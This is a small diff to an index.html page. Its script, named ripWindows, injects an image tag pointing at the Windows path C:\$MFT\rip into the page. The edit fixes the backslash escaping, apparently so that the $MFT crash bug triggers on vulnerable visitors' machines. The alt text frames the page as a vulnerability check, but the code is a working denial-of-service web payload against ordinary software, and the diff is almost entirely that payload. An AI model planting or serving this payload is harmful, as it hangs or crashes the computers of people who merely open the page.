--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <script>
       function ripWindows()
       {
-        document.getElementById('groundZero').innerHTML += '<img src="C:\$MFT\rip" alt="If you can read this, your OS and/or browser is not vulnerable to the $MFT bug!" width="150" height="150" />';
+        document.getElementById('groundZero').innerHTML += '<img src=\"C:\\$MFT\\rip\" alt="If you can read this, your OS and/or browser is not vulnerable to the $MFT bug!" width="150" height="150" />';
       }
       
       setTimeout(function()
